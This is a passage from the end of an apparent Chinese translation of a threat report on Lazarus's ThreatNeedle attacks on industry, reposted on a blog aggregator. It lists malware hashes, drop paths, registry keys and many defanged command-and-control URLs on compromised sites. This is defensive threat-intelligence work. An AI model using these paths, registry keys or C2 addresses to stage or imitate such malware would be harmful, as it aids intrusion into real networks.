16824dfd4a380699f3841a6fa7e52c6d aa74ed16b0057b31c835a5ef8a105942 85621411e4c80897c588b5df53d26270 %SYSTEMROOT%\system\avimovie.dll a611d023dfdd7ca1fab07f976d2b6629 160d0e396bf8ec87930a5df46469a960 %WINDIR%\winhelp.dll 110e1c46fd9a39a1c86292487994e5bd

下載器

ac86d95e959452d189e30fa6ded05069 %APPDATA%\Microsoft\thumbnails.db

木馬VNC上傳器

bea90d0ef40a657cb291d25c4573768d %ALLUSERSPROFILE%\adobe\arm86.dat 254a7a0c1db2bea788ca826f4b5bf51a %APPDATA%\PBL\user.tmp, %APPDATA%\Comms\Comms.dat

隧道工具

6f0c7cbd57439e391c93a2101f958ccd %APPDATA\PBL\update.tmp fc9e7dc13ce7edc590ef7dfce12fe017

LPE客戶端

0aceeb2d38fe8b5ef2899dd6b80bfc08 %TEMP%\ETS5659.tmp 09580ea6f1fe941f1984b4e1e442e0a5 %TEMP%\ETS4658.tmp

文件路徑

%SYSTEMROOT%\system32\bcdbootinfo.tlp %SYSTEMROOT%\system32\Nwsapagent.sys %SYSTEMROOT%\system32\SRService.sys %SYSTEMROOT%\system32\NWCWorkstation.sys %SYSTEMROOT%\system32\WmdmPmSp.sys %SYSTEMROOT%\system32\PCAudit.sys %SYSTEMROOT%\system32\helpsvc.sys

注冊表路徑

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig – SubVersion

域和IP

hxxp://forum.iron-maiden[.]ru/core/cache/index[.]php hxxp://www.au-pair[.]org/admin/Newspaper[.]asp hxxp://www.au-pair[.]org/admin/login[.]asp hxxp://www.colasprint[.]com/_vti_log/upload[.]asp hxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp hxxp://www.kwwa[.]org/popup/160307/popup_160308[.]asp hxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp hxxp://www.sanatoliacare[.]com/include/index[.]asp hxxps://americanhotboats[.]com/forums/core/cache/index[.]php hxxps://docentfx[.]com/wp-admin/includes/upload[.]php hxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php hxxps://polyboatowners[.]com/2010/images/BOTM/upload[.]php hxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php hxxps://shinwonbook.co[.]kr/basket/pay/open[.]asp hxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp hxxps://theforceawakenstoys[.]com/vBulletin/core/cache/upload[.]php hxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp hxxps://www.curiofirenze[.]com/include/inc-site[.]asp hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php hxxps://www.dronerc[.]it/forum/uploads/index[.]php hxxps://www.dronerc[.]it/shop_testbr/Adapter/Adapter_Config[.]php hxxps://www.edujikim[.]com/intro/blue/view[.]asp hxxps://www.edujikim[.]com/pay/sample/INIstart[.]asp hxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp hxxps://www.fabioluciani[.]com/ae/include/constant[.]asp hxxps://www.fabioluciani[.]com/es/include/include[.]asp hxxp://www.juvillage.co[.]kr/img/upload[.]asp hxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp hxxps://www.lyzeum[.]com/images/board/upload[.]asp hxxps://martiancartel[.]com/forum/customavatars/avatars[.]php hxxps://www.polyboatowners[.]com/css/index[.]php hxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp hxxps://www.raiestatesandbuilders[.]com/admin/installer/installer/index[.]php hxxp://156.245.16[.]55/admin/admin[.]asp hxxp://fredrikarnell[.]com/marocko2014/index[.]php hxxp://roit.co[.]kr/xyz/mainpage/view[.]asp

第二階段C2地址

hxxps://www.waterdoblog[.]com/uploads/index[.]asp hxxp://www.kbcwainwrightchallenge.org[.]uk/connections/dbconn[.]asp

C2 URL用于提取特洛伊木馬VNC上傳器使用的文件

hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php hxxps://newidealupvc[.]com:443/img/prettyPhoto/jquery.max[.]php hxxps://mdim.in[.]ua:443/core/cache/index[.]php hxxps://forum.snowreport[.]gr:443/cache/template/upload[.]php hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp hxxps://www.dellarocca[.]net/it/content/img/img[.]asp hxxps://www.astedams[.]it/photos/image/image[.]asp hxxps://www.geeks-board[.]com/blog/wp-content/uploads/2017/cache[.]php hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp

---

附錄II MITER ATT＆CK映射

總結(jié)

以上是生活随笔為你收集整理的[译] APT分析报告：10.Lazarus以ThreatNeedle家族攻击工业事件还原（BMP图片隐藏RAT）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。